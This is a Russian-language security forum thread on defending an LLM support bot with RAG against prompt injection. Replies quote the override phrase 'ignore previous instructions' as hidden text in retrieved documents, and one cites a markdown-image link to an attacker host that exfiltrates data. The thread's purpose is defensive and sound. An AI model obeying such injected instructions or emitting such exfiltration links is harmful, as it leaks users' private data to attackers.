LLM в продукте — кто как защищается от prompt injection? OWASP LLM Top 10

Рейтинг: 36.3% · 19 голосов
Этичный хакинг и тестирование на проникновение: OWASP Top 10, анализ уязвимостей, bug bounty, разбор CVE, защита веб-приложений и сетей.
Ответить
Аватара пользователя
mlapi1093
Сообщения: 6
Зарегистрирован: Пн май 11, 2026 12:18 am

LLM в продукте — кто как защищается от prompt injection? OWASP LLM Top 10

Сообщение mlapi1093 »

Прикрутили в саппорт-бота RAG поверх внутренней вики. ИБшники подняли вопрос про prompt injection: пользователь может через сообщение вытащить системный промпт или заставить бота лезть в чужие данные. Как у вас с этим, есть рабочие практики?
👍 ❤️ 🔥 😄1 🤔
Аватара пользователя
pynode5808
Сообщения: 31
Зарегистрирован: Пн май 11, 2026 4:55 pm

Re: LLM в продукте — кто как защищается от prompt injection? OWASP LLM Top 10

Сообщение pynode5808 »

Главное правило — не давайте модели прав, которых вы бы не дали анонимному юзеру. Авторизация и фильтрация данных должны быть НА УРОВНЕ retrieval, до того как контекст уйдёт в LLM. Сам промпт защитить нельзя, его рано или поздно вытащат.
👍 ❤️ 🔥 😄 🤔
Аватара пользователя
ruslan_flux89
Сообщения: 3
Зарегистрирован: Пн май 18, 2026 5:32 pm

Re: LLM в продукте — кто как защищается от prompt injection? OWASP LLM Top 10

Сообщение ruslan_flux89 »

Indirect prompt injection самое злое — когда инструкция спрятана в документе который попадает в RAG. Юзер вроде ничего плохого не писал, а в подгруженной странице 'ignore previous instructions and...'. Тестируйте именно этот вектор.
👍 ❤️ 🔥 😄1 🤔
Аватара пользователя
nethex8167
Сообщения: 12
Зарегистрирован: Ср май 13, 2026 10:06 am

Re: LLM в продукте — кто как защищается от prompt injection? OWASP LLM Top 10

Сообщение nethex8167 »

А guardrails-модели типа Llama Guard или промпт-классификаторы на входе помогают вообще?
👍2 ❤️ 🔥 😄1 🤔3
Аватара пользователя
natalia_quant16
Сообщения: 4
Зарегистрирован: Ср май 20, 2026 10:20 am

Re: LLM в продукте — кто как защищается от prompt injection? OWASP LLM Top 10

Сообщение natalia_quant16 »

Помогают снизить процент, но это не граница безопасности, а фильтр шума. Закладываться на то что классификатор поймает все джейлбрейки нельзя, обходят регулярно. Это defense in depth, один из слоёв.
👍1 ❤️ 🔥 😄2 🤔
Аватара пользователя
maxim_null91
Сообщения: 12
Зарегистрирован: Вс май 10, 2026 10:39 pm

Re: LLM в продукте — кто как защищается от prompt injection? OWASP LLM Top 10

Сообщение maxim_null91 »

Понял, значит делаем строгий tenant-скоупинг на этапе поиска по вектору и не даём боту инструментов с записью. Вывод тоже санитизировать перед рендером в html?
👍2 ❤️ 🔥 😄 🤔
Аватара пользователя
boris_go78
Сообщения: 4
Зарегистрирован: Пт май 15, 2026 6:26 pm

Re: LLM в продукте — кто как защищается от prompt injection? OWASP LLM Top 10

Сообщение boris_go78 »

Обязательно. Был кейс с markdown-картинкой ![](http://attacker/?data=...) — модель вставляет ссылку, браузер пользователя сам сливает данные на сервер атакующего. Экранируй вывод как недоверенный, всегда.
👍 ❤️ 🔥 😄 🤔
Аватара пользователя
anna7233
Сообщения: 9
Зарегистрирован: Вт май 12, 2026 11:57 pm

Re: LLM в продукте — кто как защищается от prompt injection? OWASP LLM Top 10

Сообщение anna7233 »

Ещё накидайте свой набор jailbreak-пейлоадов в CI и гоняйте на каждый деплой. У нас живёт regression-сьют из ~200 атак, ловит когда кто-то ослабил системный промпт.
👍 ❤️2 🔥 😄 🤔1
Ответить
Поделиться темой: ✈ Telegram VK

Вернуться в «Кибербезопасность и пентест»

Кто сейчас на конференции

Сейчас этот форум просматривают: нет зарегистрированных пользователей и 1 гость